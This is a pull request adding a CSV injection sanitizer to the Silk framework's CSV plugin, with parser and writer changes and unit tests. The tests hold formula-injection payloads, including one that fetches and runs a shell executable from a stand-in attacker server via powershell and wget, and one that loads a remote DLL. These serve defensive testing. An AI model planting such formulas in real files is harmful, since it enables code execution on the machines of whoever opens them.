### PR TITLE
Bugfix: CSV injection

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -6,6 +6,7 @@
 *.iml
 *.ipr
 *.iws
+.bsp
 #eclipse
 bin/
 target/

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
@@ -3,9 +3,6 @@ package org.silkframework.plugins.dataset.csv
 /**
  * Sanitizer for CSV rows. It deals with the causes for CSV Injection, as documented in
  * https://owasp.org/www-community/attacks/CSV_Injection.
- *
- * The solution is backported from DataPlatform. See https://gitlab.eccenca.com/elds/backend/-/merge_requests/591/diffs
- * as well as the task https://jira.eccenca.com/browse/CMEM-4219 for further details.
  */
 object CSVSanitizer {
   def sanitize(str: String): String = {

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
@@ -7,13 +7,11 @@ package org.silkframework.plugins.dataset.csv
 object CSVSanitizer {
   def sanitize(str: String): String = {
     if (str.isEmpty) "\"\"" // there are CSV parsers that only accept "" as an escaped quote
-    else if (
-      str.startsWith("=") || str.startsWith("+") || str.startsWith("-")
+    else if (str.startsWith("=") || str.startsWith("+") || str.startsWith("-")
         || str.startsWith("@") || str.startsWith("\\u000D") || str.startsWith("\\u0009")
     ) "\"'" + doubleQuoteMask(str) + "\""
-    else if (
-      str.contains("\"") || str.contains(",") || str.contains("\r") || str.contains("\n")
-    ) "\"" + doubleQuoteMask(str) + "\""
+    else if (str.contains("\"") || str.contains(",") || str.contains("\r") || str.contains("\n"))
+      doubleQuoteMask(str)
     else str
   }
 

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
@@ -1,17 +1,14 @@
 package org.silkframework.plugins.dataset.csv
 
 /**
- * Sanitizer for CSV rows. It deals with the causes for CSV Injection, as documented in
+ * Sanitizer for CSV rows. It deals with the main cause for CSV Injection, as documented in
  * https://owasp.org/www-community/attacks/CSV_Injection.
  */
 object CSVSanitizer {
   def sanitize(str: String): String = {
-    if (str.isEmpty) "\"\"" // there are CSV parsers that only accept "" as an escaped quote
-    else if (str.startsWith("=") || str.startsWith("+") || str.startsWith("-")
+    if (str.startsWith("=") || str.startsWith("+") || str.startsWith("-")
         || str.startsWith("@") || str.startsWith("\\u000D") || str.startsWith("\\u0009")
     ) "\"'" + doubleQuoteMask(str) + "\""
-    else if (str.contains("\"") || str.contains(",") || str.contains("\r") || str.contains("\n"))
-      doubleQuoteMask(str)
     else str
   }
 

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CSVSanitizer.scala
@@ -1,0 +1,24 @@
+package org.silkframework.plugins.dataset.csv
+
+/**
+ * Sanitizer for CSV rows. It deals with the causes for CSV Injection, as documented in
+ * https://owasp.org/www-community/attacks/CSV_Injection.
+ *
+ * The solution is backported from DataPlatform. See https://gitlab.eccenca.com/elds/backend/-/merge_requests/591/diffs
+ * as well as the task https://jira.eccenca.com/browse/CMEM-4219 for further details.
+ */
+object CSVSanitizer {
+  def sanitize(str: String): String = {
+    if (str.isEmpty) "\"\"" // there are CSV parsers that only accept "" as an escaped quote
+    else if (
+      str.startsWith("=") || str.startsWith("+") || str.startsWith("-")
+        || str.startsWith("@") || str.startsWith("\\u000D") || str.startsWith("\\u0009")
+    ) "\"'" + doubleQuoteMask(str) + "\""
+    else if (
+      str.contains("\"") || str.contains(",") || str.contains("\r") || str.contains("\n")
+    ) "\"" + doubleQuoteMask(str) + "\""
+    else str
+  }
+
+  private def doubleQuoteMask(str: String): String = str.replace("\"", "\"\"")
+}

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
@@ -1,10 +1,10 @@
 package org.silkframework.plugins.dataset.csv
 
-import java.io.Reader
-import java.util.logging.Logger
 import com.univocity.parsers.csv.{CsvParserSettings, CsvParser => UniCsvParser}
 
-import scala.util.{Failure, Success, Try}
+import java.io.Reader
+import java.util.logging.Logger
+import scala.util.Try
 
 class CsvParser(selectedIndices: Seq[Int], settings: CsvSettings) {
   private final val MAX_CHARS_PER_COLUMNS_DEFAULT = 100000
@@ -44,13 +44,7 @@ class CsvParser(selectedIndices: Seq[Int], settings: CsvSettings) {
     * Returns the next entry from the CSV file. beginParsing must be called before calling this method.
     * If it reached the end of the [[java.io.Reader]] it will return None.
     */
-  def parseNext(): Option[Array[String]] = Try {
-    val parsed = parser.parseNext()
-    if (parsed != null) parsed.map(CSVSanitizer.sanitize) else parsed
-  } match {
-    case Failure(exception) => throw exception
-    case Success(value) => Some(value)
-  }
+  def parseNext(): Option[Array[String]] = Option(parser.parseNext())
 
   /** Stops parsing and closes all open resources. */
   def stopParsing(): Unit = {

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
@@ -2,10 +2,9 @@ package org.silkframework.plugins.dataset.csv
 
 import java.io.Reader
 import java.util.logging.Logger
-
 import com.univocity.parsers.csv.{CsvParserSettings, CsvParser => UniCsvParser}
 
-import scala.util.Try
+import scala.util.{Failure, Success, Try}
 
 class CsvParser(selectedIndices: Seq[Int], settings: CsvSettings) {
   private final val MAX_CHARS_PER_COLUMNS_DEFAULT = 100000
@@ -46,8 +45,12 @@ class CsvParser(selectedIndices: Seq[Int], settings: CsvSettings) {
     * If it reached the end of the [[java.io.Reader]] it will return None.
     */
   def parseNext(): Option[Array[String]] = Try {
-    parser.parseNext().filterNot(_ == null).map(cell => CSVSanitizer.sanitize(cell))
-  }.toOption
+    val parsed = parser.parseNext()
+    if (parsed != null) parsed.map(CSVSanitizer.sanitize) else parsed
+  } match {
+    case Failure(exception) => throw exception
+    case Success(value) => Some(value)
+  }
 
   /** Stops parsing and closes all open resources. */
   def stopParsing(): Unit = {

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
@@ -45,9 +45,9 @@ class CsvParser(selectedIndices: Seq[Int], settings: CsvSettings) {
     * Returns the next entry from the CSV file. beginParsing must be called before calling this method.
     * If it reached the end of the [[java.io.Reader]] it will return None.
     */
-  def parseNext(): Option[Array[String]] = {
-    Option(parser.parseNext().map(cell => CSVSanitizer.sanitize(cell)))
-  }
+  def parseNext(): Option[Array[String]] = Try {
+    parser.parseNext().filterNot(_ == null).map(cell => CSVSanitizer.sanitize(cell))
+  }.toOption
 
   /** Stops parsing and closes all open resources. */
   def stopParsing(): Unit = {

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvParser.scala
@@ -46,7 +46,7 @@ class CsvParser(selectedIndices: Seq[Int], settings: CsvSettings) {
     * If it reached the end of the [[java.io.Reader]] it will return None.
     */
   def parseNext(): Option[Array[String]] = {
-    Option(parser.parseNext())
+    Option(parser.parseNext().map(cell => CSVSanitizer.sanitize(cell)))
   }
 
   /** Stops parsing and closes all open resources. */

--- a/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvWriter.scala
+++ b/silk-plugins/silk-plugins-csv/src/main/scala/org/silkframework/plugins/dataset/csv/CsvWriter.scala
@@ -26,7 +26,8 @@ class CsvWriter(resource: WritableResource, properties: Seq[TypedProperty], sett
     * Writes a row.
     */
   def writeLine(values: Seq[String]): Unit = {
-    csvWriter.writeRow(values: _*)
+    val sanitizedRow = values.map(CSVSanitizer.sanitize)
+    csvWriter.writeRow(sanitizedRow: _*)
   }
 
   /**

--- a/silk-plugins/silk-plugins-csv/src/test/scala/org/silkframework/plugins/dataset/csv/CSVSanitizerTest.scala
+++ b/silk-plugins/silk-plugins-csv/src/test/scala/org/silkframework/plugins/dataset/csv/CSVSanitizerTest.scala
@@ -1,0 +1,13 @@
+package org.silkframework.plugins.dataset.csv
+
+import org.scalatest.flatspec.AnyFlatSpec
+import org.scalatest.matchers.should.Matchers
+import CSVSanitizer.sanitize
+
+class CSVSanitizerTest extends AnyFlatSpec with Matchers {
+  it should "sanitize the documented examples in OWASP" in {
+    // Examples from https://owasp.org/www-community/attacks/CSV_Injection
+    sanitize("""=1+2";=1+2""") shouldBe """"'=1+2"";=1+2""""
+    sanitize("""=1+2'" ;,=1+2""") shouldBe """"'=1+2'"" ;,=1+2""""
+  }
+}

--- a/silk-plugins/silk-plugins-csv/src/test/scala/org/silkframework/plugins/dataset/csv/CSVSanitizerTest.scala
+++ b/silk-plugins/silk-plugins-csv/src/test/scala/org/silkframework/plugins/dataset/csv/CSVSanitizerTest.scala
@@ -5,9 +5,19 @@ import org.scalatest.matchers.should.Matchers
 import CSVSanitizer.sanitize
 
 class CSVSanitizerTest extends AnyFlatSpec with Matchers {
+  // Examples from https://owasp.org/www-community/attacks/CSV_Injection
   it should "sanitize the documented examples in OWASP" in {
-    // Examples from https://owasp.org/www-community/attacks/CSV_Injection
     sanitize("""=1+2";=1+2""") shouldBe """"'=1+2"";=1+2""""
     sanitize("""=1+2'" ;,=1+2""") shouldBe """"'=1+2'"" ;,=1+2""""
+  }
+
+  // Examples from https://github.com/payloadbox/csv-injection-payloads
+  it should "sanitize the CSV injection payloads" in {
+    sanitize("""=DDE("cmd";"/C calc";"!A0")A0""") shouldBe """"'=DDE(""cmd"";""/C calc"";""!A0"")A0""""
+    sanitize("""@SUM(1+9)*cmd|' /C calc'!A0""") shouldBe """"'@SUM(1+9)*cmd|' /C calc'!A0""""
+    sanitize("""=10+20+cmd|' /C calc'!A0""") shouldBe """"'=10+20+cmd|' /C calc'!A0""""
+    sanitize("""=cmd|' /C notepad'!'A1'""") shouldBe """"'=cmd|' /C notepad'!'A1'""""
+    sanitize("""=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0""") shouldBe """"'=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0""""
+    sanitize("""=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1""") shouldBe """"'=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1""""
   }
 }


### PR DESCRIPTION
**Bugfix: CSV Injection**

This PR adds a **sanitizer** for CSV rows. It deals with the causes for CSV Injection, as documented in https://owasp.org/www-community/attacks/CSV_Injection.

The `CsvParser` from [Univocity](https://github.com/uniVocity/univocity-parsers) can't be extended (it's `final`) in a "sanitizing subclass of CsvParser", so the solution simply maps over the **cells** and converts them explicitly.